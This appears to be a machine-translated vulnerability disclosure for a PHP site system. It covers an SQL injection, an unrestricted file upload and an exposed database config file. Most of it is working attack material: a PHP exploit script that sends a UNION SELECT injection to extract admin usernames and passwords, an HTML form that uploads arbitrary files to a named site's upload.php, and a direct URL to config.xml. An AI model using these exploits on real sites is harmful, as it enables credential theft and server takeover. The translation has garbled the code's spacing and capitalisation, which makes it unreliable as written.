Brief description:
// PageArt. php //.. $ column = $ _ POST ["column"]; $ rownum = $ _ POST ["rownum"]; $ SQL = "select id, title, addtime from Maid where column_id = ". $ column ;//.. other similar files .. exp:
<? Php
Error_reporting (E_ERROR );
Print_r ('
+ --------------------------------------------------------------------- +
SQL injection Vul Exploit
Exp: black guy cfking
Home: [url] www.2cto.com [/url] [url] www.webvul.com [/url]
2011.09.20
+ --------------------------------------------------------------------- +
');
If ($ argc <2 ){
Print_r ('
Usage: php '. $ argv [0]. 'Host/path
Example: php '. $ argv [0].' [url] www.2cto.com [/url] test
');
Die ();
}
Ob_start ();
$ Host = $ argv [1];
$ Path = $ argv [2];
$ Sock = fsockopen ($ host, 80, $ errno, $ errstr, 30 );
If (! $ Sock) die ("$ errstr ($ errno) \ n ");
Fwrite ($ sock, "GET/article. php? Id = 255% 20and % 2201 = 2% 20 union + select + 0, concat (0x63666B696E677339307365637E, uname, 0x2D, upass, 0x7E31, 1.1 + from + maid + LIMIT + -- HTTP/\ r \ n ");
Fwrite ($ sock, "Host: $ host \ r \ n ");
Fwrite ($ sock, "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv: 6.0.2) Gecko/20100101 Firefox/6.0.2 \ r \ n ");
Fwrite ($ sock, "Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8 \ r \ n ");
Fwrite ($ sock, "Accept-Language: zh-cn, zh; q= 0.5 \ r \ n ");
Fwrite ($ sock, "Connection: keep-alive \ r \ n ");
$ Headers = "";
While ($ str = trim (fgets ($ sock, 1024 )))
$ Headers. = "$ str \ n ";
$ Body = "";
While (! Feof ($ sock ))
$ Body. = fgets ($ sock, 1024 );
Fclose ($ sock );
Ob_end_flush ();
// Print_r ($ body );
If (strpos ($ body, 'cfkings90sec ')! = False ){
Preg_match ('/cfkings90sec ~ (.*?)~ 1/', $ body, $ arr );
$ Result = explode ("-", $ arr [1]);
Print_r ("Exploit Success! \ Nusername: ". $ result [0]." \ npassword: ". $ result [1]." \ n ");
}
Else {
Print_r ("Exploit Failed! \ N ");
}
File Upload:
Vulnerability file: admin/column/upload. php
Admin/article/upload. php $ upload_dir = '.. /.. /uploads/'; $ file_path = $ upload_dir. $ _ FILES ['myfile'] ['name']; $ MAX_SIZE = 20000000; echo $ _ POST ['buttoninfo']; ...... if ($ _ FILES ['myfile'] ['SIZE']> $ MAX_SIZE) echo "the size of the uploaded file exceeds the specified size "; if ($ _ FILES ['myfile'] ['SIZE'] = 0) echo "select the uploaded file"; if (! Move_uploaded_file ($ _ FILES ['myfile'] ['tmp _ name'], $ file_path) echo "failed to copy the file. please upload it again ";
There are no restrictions on the two files!
Exp:
<Meta http-equiv = "Content-Type" content = "text/html; charset = gb2312"/>
<Form enctype = "multipart/form-data" action = "http://www.bkjia.com/admin/column/upload. php" method = "post">
<P> uploaded website and directory/uploads/file name <p>
<Input type = "file" name = "myfile" size = "20">
<Input type = "submit" value = "Upload">
</Form>
Information Leakage:
Http://www.bkjia.com/admin/lib/db/config. xml